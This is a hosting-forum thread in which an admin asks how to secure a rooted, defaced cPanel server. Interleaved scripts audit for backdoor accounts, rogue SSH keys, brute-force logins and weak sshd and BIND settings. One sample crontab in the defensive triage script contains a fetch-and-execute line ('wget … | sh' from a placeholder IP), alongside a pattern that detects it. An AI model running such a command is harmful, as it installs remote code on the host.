sphost

Well-Known Member
Jan 19, 2004
59
0
156
My server was hacked by backd00red; they gained access to the server, changed the root password and defaced most sites on the server!
How could they access root? I have a very strong password.

My question: how do I secure the server now that it is reinstalled?

thanks

Tom
 

wonker

Active Member
Dec 5, 2007
32
5
58
Maybe with the latest OpenSSH exploit that is rumoured all over the web?
 

eth00

Well-Known Member
PartnerNOC
Mar 30, 2003
721
1
168
NC
cPanel Access Level
Root Administrator
Was everything updated? Do you run the latest kernel on your machine? Did you do anything towards security on your server, or did you let it do its own thing after you ordered it?
 

sphost

Well-Known Member
Jan 19, 2004
59
0
156
Was everything updated? Do you run the latest kernel on your machine? Did you do anything towards security on your server, or did you let it do its own thing after you ordered it?
Just left it as is!!
 

sphost

Well-Known Member
Jan 19, 2004
59
0
156
Is there any reliable company out there that offers a server-securing service?
 

Spiral

BANNED
Jun 24, 2005
2,020
8
193
My server was hacked by backd00red; they gained access to the server, changed the root password and defaced most sites on the server!
How could they access root? I have a very strong password.
My question: how do I secure the server now that it is reinstalled?
Is there any reliable company out there that offers a server-securing service?
I will be glad to take a look and help you clean up the mess and secure your server. Contact me!

I have more than 30 years field experience in network and server security, written
many network security books, teach on the subject, and own several computer security
consulting firms with clients around the globe so I am definitely in a position to help
you recover and can show you a lot of things you maybe didn't think about originally
that may or may not have led to the current breach. The bigger question is whether you
fully grasp the extent of your current situation you just described? There is also a
very good chance that whoever got into your server also installed backdoors for
themselves to regain access again at a later date and that will also need to be
determined and closed out in addition to hardening the security on your server.

Don't worry about any money at the moment, I am more concerned with
stopping attacks like these and I am only glad to help and can give you a
very big helping hand working through this issue. We need to get your server
back to a safe state and get you much better security so you don't have to
go through this again. I am most concerned that you may have far more issues
than you are aware (or even begin to grasp at the current moment) since I have
dealt with the clean up of thousands of these sort of attacks. I would almost
guarantee your server now has a huge number of backdoors and other security
compromises already in place to be concerned about above and beyond the
original path of exploit and that is what I would be most concerned about first.
If these issues are not handled properly right now, you are just going to run
into the same situation again or far worse. Once that is addressed then the
fun task of cleanup can press forward and then server security hardening so
that this becomes an isolated incident that doesn't repeat for you.

I will be on for another few hours and keep an eye on private messages
if you want to reach me. I'll also send you a message how to reach me.

EDIT: Regarding italics above. I'm going offline now but will be back tomorrow.
 
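Spiral's warning above is that whoever got root will have left a way back in, and that has to be found before hardening means anything. The script below is an added example, not Spiral's tooling and not anything from sphost's server: it shows three of the places a practitioner checks first (extra uid-0 accounts in /etc/passwd, cron entries that pull and execute remote content, and SSH keys the admin never issued). Each function reads a file on stdin so it can be pointed at a mounted copy of the compromised disk rather than the live box. The sample passwd, crontab and authorized_keys contents are constructed for the example; the IP 203.0.113.7 is documentation space, and the "tom@laptop" key comment is an assumed admin key.

```shell
#!/bin/sh
# Added example: offline triage of common root-level persistence. Not from the thread.

# Constructed /etc/passwd with a second uid-0 account, a classic backdoor.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
named:x:25:25:Named:/var/named:/sbin/nologin
tom:x:500:500:Tom:/home/tom:/bin/bash
toor:x:0:0::/root:/bin/bash'

# Constructed root crontab; the second line re-fetches and runs a payload every minute.
SAMPLE_CRON='0 4 * * * /usr/local/cpanel/scripts/upcp --cron
* * * * * wget -q -O - http://203.0.113.7/x.sh | sh
30 2 * * 0 /usr/bin/rkhunter --cronjob'

# Constructed authorized_keys; the second key was not issued by the admin (assumption).
SAMPLE_AUTHKEYS='ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAexampleadminkey== tom@laptop
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAexamplerogue0== r00t@backd00r'

# uid0_accounts < passwd : print every account with uid 0 other than root.
uid0_accounts() {
  awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# suspicious_cron < crontab : print entries that pipe downloaded content into an
# interpreter, or that run something out of a world-writable directory.
suspicious_cron() {
  awk '
    /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
    /(wget|curl)[^|]*[|][[:space:]]*(sh|bash|perl|python)/ { print; next }
    /\/(tmp|dev\/shm|var\/tmp)\// { print; next }
  '
}

# unknown_keys KNOWN < authorized_keys : print the comment of every key whose
# comment is not in the comma-separated KNOWN list the admin maintains.
unknown_keys() {
  awk -v known="$1" '
    BEGIN { n = split(known, k, ","); for (i = 1; i <= n; i++) ok[k[i]] = 1 }
    NF >= 3 && !($NF in ok) { print $NF }
  '
}

# Stand-alone run over the constructed samples.
echo "== uid-0 accounts other than root =="
printf '%s\n' "$SAMPLE_PASSWD" | uid0_accounts
echo "== suspicious cron entries =="
printf '%s\n' "$SAMPLE_CRON" | suspicious_cron
echo "== ssh keys not on the admin list =="
printf '%s\n' "$SAMPLE_AUTHKEYS" | unknown_keys "tom@laptop"
```

On a real host the same functions run as `uid0_accounts < /mnt/evidence/etc/passwd`, `suspicious_cron < /mnt/evidence/var/spool/cron/root` and `unknown_keys "tom@laptop" < /mnt/evidence/root/.ssh/authorized_keys`. They are a starting point, not a rootkit scanner: a kernel-level rootkit hides from all of this, which is why the thread's advice to rebuild from clean media still stands.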

Spiral

BANNED
Jun 24, 2005
2,020
8
193
JPetersen:

I would love to answer your questions, but the last time my identity slipped
out publicly online, that was a huge mistake and I am very
careful now what I let slip and choose my words very carefully and
very deliberately for good reason. Don't think I am blowing you off
because I am here and now giving you a thoughtful personal answer.

Someone I helped a few years ago and later flew up to meet me
posted my identity the next week and I got rushed with thousands of
"help me", "can I hire you", and "how do you secure this or that" and
general fan lore questions which to be honest was a bit overwhelming.
I would prefer not to get into all that all over again so I am sure you
can respect my interest in privacy.

If you are really that curious though, it is not exactly rocket science to
figure out who I am just on what side facts you already know about me
and my writings and posts in this and dozens of other forums but I would
prefer you leave that to your own quiet speculation. Many thanks. :cool:

Anyway, to your larger and unspoken question ...

I am here first and foremost because I enjoy helping people and I do what
I can to help those who really need help concentrating the most on
those people I feel need the help the most. Most of these people would
not be able to afford hiring anyone at my level so they have really nowhere
to turn other than to scout online help forums (like this one and dozens
of other similar forum communities) out there.

I have a different name in every forum community but you can be sure
that I monitor a great many of them as these are the place you find people
with the most questions and in the most need and I help people where I can.

If you doubt any of that, just read all my posts here posted through the years.

sphost said:
My server is hacked by backd00red , they gained access to the server and changed rot password, they defaced most site on the server!
how can they access the root? i have a very strong password.

my question, how do i secure the server now after it is reinstalled?
Now in the case of sphost, he got hit with an unexpected attack per his post
above and clearly thought his security was "good enough" which it obviously
wasn't and that is good enough for me. Under those conditions, I'll help anyone
that asks for my help assuming they can get my attention but I watch these
forums fairly close so it is not all that hard to do.

-Spiral

PS: Incidentally, for those who have a need to know, I do let them know. As for
those people and the people I choose to help (and there have been many
through the years), most I can now consider friends,
some very close friends.
 

jpetersen

Well-Known Member
Dec 31, 2006
113
4
168
Spiral said:
I would love to answer your questions, but the last time my identity slipped
out publicly online, that was a huge mistake and I am very
careful now what I let slip and choose my words very carefully and
very deliberately for good reason.
I do know who you are, and googling for "your name" (with quotes) and "author" does not return any results of books written by you. Please send me a PM with the names of the books you have authored, including ISBN. I promise I will not share this information with anyone, and I will not ask you to help me, or ask about hiring you, or ask about how to do anything that pertains to security. If your books sound interesting, I would purchase them instead so that you can be rewarded for your efforts.

Thanks.
 

Spiral

BANNED
Jun 24, 2005
2,020
8
193
Sorry to bump the thread once again; anyone know?
As I told you, I'll help you with that! :rolleyes:

I can give you a long list of people and companies that can help you
but there are very few, if any, that could help you to the extent that
I can and I am not asking for any money either which is a plus for you.

Just to give you other options, chk's recommendation of asking Chirpy for
help isn't a bad idea and I have known Chirpy plenty long enough and I
have seen his work enough first hand to vouch for him. I also routinely
use his firewall script myself. PlatinumServerM, also around here, has
reasonable enough experience to help you with this issue and has his own
server management company as well. A friend of mine, Crosswinds, might
be able to help you. I don't know if he would take you on since his interests
lie elsewhere but crosswinds is one of the very few people I can talk to on
a peer level and that says a whole lot actually and I know he would have
the necessary skills to help you out and be able to rip through your server
and get you back where you need to be with real security added in the
process along the way. These are the few people around here that I would
personally trust outside myself. ;)

If you are feeling a bit paranoid or otherwise just wanting to do everything
yourself, that is fine. Talk to me and I'll still try to guide you through
the steps of where to go, what to look for, what to update, and what
you need to know to get your server fixed and heavily secured. If you
are lucky, maybe find out exactly how you were originally hacked if you
haven't already destroyed the evidence the hacker may have left behind.
 

sphost

Well-Known Member
Jan 19, 2004
59
0
156
I've used and recommend Chirpy. He's a moderator here, has well over 13,000 posts, and knows his stuff.
Thanks a lot for your recommendation.

As I told you, I'll help you with that! :rolleyes:

I can give you a long list of people and companies that can help you
but there are very few, if any, that could help you to the extent that
I can and I am not asking for any money either which is a plus for you.
Spiral, I really appreciate your offer. Thing is, the server was formatted and my DC did a reinstall, so what I am basically looking for is someone to secure my server, not to restore it.

As for your free offer, I do appreciate it as well, but I prefer to pay for what I get. While it IS so kind of you, I really can't accept that. However, if you are serious about helping me do it myself, this will make me learn a lot; I recommend that you post a SECURE YOUR SERVER type of thread in public so other people benefit from it as well, like this thread, which is very useful. Unfortunately I did everything mentioned there but my server still got hacked, so it looks like there is a lot more to be done.
 

Spiral

BANNED
Jun 24, 2005
2,020
8
193
Spiral, I really appreciate your offer. Thing is, the server was formatted and my DC did a reinstall, so what I am basically looking for is someone to secure my server, not to restore it.
That would be my primary professional specialty! :D

I could help you diagnose the issue and track down the source of the
original attack but if you already reloaded the server, there is not much
use in that so yes the next step would be to secure the server and
I definitely can help you with that far beyond your wildest dreams.

Generally it is good to dig through things for forensic purposes before
blowing away the server but since you've already jumped ahead,
not much can be done other than to press forward with getting
you re-setup again and secured so this doesn't happen again.

As for your free offer, I do appreciate it as well, but I prefer to pay for what I get. While it IS so kind of you, I really can't accept that. However, if you are serious about helping me do it myself, this will make me learn a lot; I recommend that you post a SECURE YOUR SERVER type of thread in public so other people benefit from it as well, like this thread, which is very useful. Unfortunately I did everything mentioned there but my server still got hacked, so it looks like there is a lot more to be done.
There is absolutely a WHOLE LOT more to be done!

If you have read my posts here, you will see that I often address
many issues that are often overlooked. While the "secure your server"
type threads here and elsewhere are useful for the basics, they often
overlook many of the more important areas where you might be vulnerable
and the hackers out there aren't going to be so ignorant. The bigger
thing to know and understand is "how things work" and the reasons why
there are vulnerabilities. A hacker doesn't think about where you have
secured your server so much as what you may have missed.

Regarding posting a thread, I'm actually in the process of doing much
better than that. I have a new book that is coming out soon that
will have a CD that automatically secures everything for Linux servers
particularly those running Cpanel or Plesk. Once we get the bugs
worked out in that program and some of the licensing issues, I'm
considering posting a link to downloading it on here so that may
be coming along fairly soon.

Now regarding your mentioning "you did all", I would like to sit down
with you and discuss exactly everything you can remember you did
originally as that will give me some insight as to your original configuration,
the areas you may have missed, and where you more likely got hacked,
and also would tell me what areas I may need to bring you more up to
speed on and get you to strengthen your understanding.

Regarding your offer to pay, I won't rescind my offer but I'll do it this way.
If you think my help to you is valuable, you can go ahead and pay me
what you think it is worth to you. Fair enough?

I'll be offline for the next hour or so as there is a place I need to be
but I'll be online most of this evening if you want to try to catch up
to me. I left you a message yesterday with my contact info so that
you can reach me outside of the private messages here.
 

sphost

Well-Known Member
Jan 19, 2004
59
0
156
Now regarding your mentioning "you did all", I would like to sit down
with you and discuss exactly everything you can remember you did
originally as that will give me some insight as to your original configuration,
the areas you may have missed, and where you more likely got hacked,
and also would tell me what areas I may need to bring you more up to
speed on and get you to strengthen your understanding.

This was basically what I did: http://forums.cpanel.net/f7/beginners-guide-securing-your-server-30159.html
 

ddmd

Registered
Jul 11, 2009
3
0
51
Maybe they did not find your root password, but another user's password, and exploited some local vulnerability to get root?

Did you check your logs to see if they brute forced it? As far as monitoring, this is what I just posted on another thread:

I had a similar problem a while ago and used the OSSEC tool (open source) to find all offending packages. It has a nice rootkit/worm/exploit detection tool in there....

After that, I kept that running with Snort and ModSecurity (all open source) to monitor my systems. I lately also found Sucuri to remotely check if my sites have been defaced, blacklisted, etc.

links:
Welcome to the Home of OSSEC
ModSecurity: Open Source Web Application Firewall
Snort :: Home Page
Sucuri information security (BETA)
 
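ddmd's question about whether the logs show a brute force is the first thing to answer, because a "very strong" root password still falls to a guessing run if the policy lets it be tried without limit, and a success that follows a string of failures from the same address is the signature to look for. The script below is an added example (not ddmd's, not from OSSEC or any product in the thread) that does that count over sshd lines in /var/log/secure. The log lines are constructed in the format RHEL/Fedora-era sshd writes; the addresses are documentation space and the user names are assumed.

```shell
#!/bin/sh
# Added example: per-source sshd failure counts with "failures then a success" flagging.

# Constructed extract of /var/log/secure (not from the server in the thread).
SAMPLE_LOG='Jul 11 03:12:01 srv sshd[2211]: Failed password for root from 203.0.113.7 port 51112 ssh2
Jul 11 03:12:03 srv sshd[2213]: Failed password for root from 203.0.113.7 port 51113 ssh2
Jul 11 03:12:05 srv sshd[2215]: Failed password for invalid user admin from 203.0.113.7 port 51114 ssh2
Jul 11 03:12:07 srv sshd[2217]: Failed password for root from 203.0.113.7 port 51115 ssh2
Jul 11 03:12:09 srv sshd[2219]: Accepted password for root from 203.0.113.7 port 51116 ssh2
Jul 11 03:15:40 srv sshd[2301]: Failed password for tom from 198.51.100.23 port 40022 ssh2
Jul 11 03:15:45 srv sshd[2303]: Accepted publickey for tom from 198.51.100.23 port 40023 ssh2
Jul 11 04:01:00 srv sshd[2410]: Accepted publickey for tom from 192.0.2.5 port 33000 ssh2'

# ssh_auth_summary THRESHOLD < log
# Prints "IP failures accepts", one line per source address with at least THRESHOLD
# failed password attempts. Addresses that only ever succeeded are not listed.
ssh_auth_summary() {
  awk -v thr="$1" '
    /sshd\[[0-9]+\]: (Failed password|Accepted (password|publickey)) for / {
      ip = ""
      for (i = 1; i <= NF; i++) if ($i == "from") { ip = $(i + 1); break }
      if (ip == "") next
      if ($0 ~ /: Failed password/) fail[ip]++; else ok[ip]++
    }
    END {
      for (ip in fail)
        if (fail[ip] >= thr) printf "%s %d %d\n", ip, fail[ip], ok[ip] + 0
    }
  ' | sort
}

# likely_compromised THRESHOLD < log
# Addresses that crossed the failure threshold AND later got an Accepted line: a
# password was guessed, and that account needs its credentials rotated now.
likely_compromised() {
  ssh_auth_summary "$1" | awk '$3 > 0 { print $1 }'
}

# Stand-alone run over the constructed lines.
echo "== sources with >= 3 failures (ip failures accepts) =="
printf '%s\n' "$SAMPLE_LOG" | ssh_auth_summary 3
echo "== guessed logins =="
printf '%s\n' "$SAMPLE_LOG" | likely_compromised 3
```

On a live box run it as `ssh_auth_summary 20 < /var/log/secure`; a single typo from a legitimate user (198.51.100.23 in the sample) drops out at any sensible threshold, while a long run followed by an Accepted line is the thing to act on. A compromised root can also truncate or edit this log, so an empty result after a known break-in is itself a finding, and the log copied off-host by a tool like the OSSEC agent ddmd mentions is the one to trust.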

Spiral

BANNED
Jun 24, 2005
2,020
8
193
Maybe they did not find your root password, but another user's password, and exploited some local vulnerability to get root?
Sphost was (and still is, unfortunately) using an obsolete, almost EOL version
of Fedora, and the BIND server had not originally been patched or secured
in the original server configuration, so the hackers had used an old exploit
to gain a root shell via a DNS attack. It would not have worked on most
servers today, so they were actually lucky finding his server.

His server has now been fully secured and the vulnerable areas have
been manually patched and reconfigured so the previous vulnerabilities
no longer exist, the server fully hardened, and an extensive list of
defensive technologies have been put in place to help protect him
from future exploit and hacking attempts.

He's in a lot better shape now and has also been upgraded in the process
to Apache 2.2.11 along with Suhosin hardened suPHP and other goodies
including a well configured firewall and port scan monitors, rootkit detectors,
intelligent traffic monitoring, self updating protection, and other fun stuff.
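The thread ends with Spiral's summary that the BIND server had gone unpatched and that the reconfiguration was done by hand, without saying what was changed. As an added example (not Spiral's work and not the cPanel beginner's guide sphost followed), the script below audits two of the services this thread turns on: sshd, which is how a "very strong" root password gets guessed when direct root login and password authentication are left on, and BIND's named.conf, where an open recursive resolver and a disclosed version string make the server both easy to find and easy to fingerprint. The config snippets are constructed; the sshd defaults used when a line is absent or commented out (root login and password authentication permitted, protocol 2) are an assumption about the OpenSSH of that era, and the user name "tom" is assumed. The audit checks configuration only; it does not replace a supported OS and vendor updates, which is what the unpatched BIND on a near-EOL Fedora actually needed.

```shell
#!/bin/sh
# Added example: post-reinstall audit of sshd_config and named.conf. Not from the thread.

# Constructed sshd_config as it ships on many stock installs of that era.
WEAK_SSHD='#Port 22
Protocol 2,1
PermitRootLogin yes
#PasswordAuthentication yes
UsePAM yes'

# Constructed hardened counterpart: protocol 2 only, no direct root, keys only, allow-list.
HARD_SSHD='Port 2222
Protocol 2
PermitRootLogin no
PasswordAuthentication no
PermitEmptyPasswords no
AllowUsers tom
UsePAM yes'

# Constructed named.conf options of an open recursive resolver that leaks its version.
WEAK_NAMED='options {
        directory "/var/named";
        recursion yes;
};'

# Constructed hardened counterpart: recursion for localhost only, no transfers, no banner.
HARD_NAMED='options {
        directory "/var/named";
        version "not disclosed";
        recursion yes;
        allow-recursion { 127.0.0.1; };
        allow-transfer { none; };
};'

# sshd_value KEY DEFAULT < sshd_config
# Effective value of KEY: sshd honours the first uncommented occurrence, otherwise DEFAULT.
sshd_value() {
  awk -v key="$1" -v def="$2" '
    tolower($1) == tolower(key) && !done { v = $2; done = 1 }
    END { print (v == "" ? def : v) }
  '
}

# audit_sshd < sshd_config : one finding per line, nothing when the config is clean.
audit_sshd() {
  cfg=$(cat)
  [ "$(printf '%s\n' "$cfg" | sshd_value PermitRootLogin yes)" = "no" ] \
    || echo "PermitRootLogin: direct root login over ssh is allowed"
  [ "$(printf '%s\n' "$cfg" | sshd_value PasswordAuthentication yes)" = "no" ] \
    || echo "PasswordAuthentication: passwords accepted, so root is brute-forceable; use keys"
  case "$(printf '%s\n' "$cfg" | sshd_value Protocol 2)" in
    *1*) echo "Protocol: SSH protocol 1 is enabled" ;;
  esac
  [ "$(printf '%s\n' "$cfg" | sshd_value AllowUsers "")" != "" ] \
    || echo "AllowUsers: no login allow-list, every system account can try to log in"
  return 0
}

# audit_named < named.conf : one finding per line, nothing when the config is clean.
audit_named() {
  cfg=$(cat)
  if printf '%s\n' "$cfg" | grep -Eq '^[[:space:]]*recursion[[:space:]]+yes'; then
    printf '%s\n' "$cfg" | grep -Eq '^[[:space:]]*allow-recursion' \
      || echo "recursion: open recursive resolver (no allow-recursion list)"
  fi
  printf '%s\n' "$cfg" | grep -Eq '^[[:space:]]*version[[:space:]]+"' \
    || echo "version: BIND version string is disclosed to anyone who asks"
  printf '%s\n' "$cfg" | grep -Eq '^[[:space:]]*allow-transfer' \
    || echo "allow-transfer: zone transfers are not restricted"
  return 0
}

# Stand-alone run over the constructed configs (the hardened ones produce no output).
echo "== sshd (stock) ==";  printf '%s\n' "$WEAK_SSHD"  | audit_sshd
echo "== named (stock) ==";  printf '%s\n' "$WEAK_NAMED" | audit_named
echo "== sshd (hardened) =="; printf '%s\n' "$HARD_SSHD" | audit_sshd
```

Run it against the real files with `audit_sshd < /etc/ssh/sshd_config` and `audit_named < /etc/named.conf`, then `sshd -t` and `named-checkconf` after any change so a typo does not lock you out or take DNS down. Hiding the version string is cosmetic; the finding that matters in this thread is that BIND must be at a patched release, which no config check can tell you.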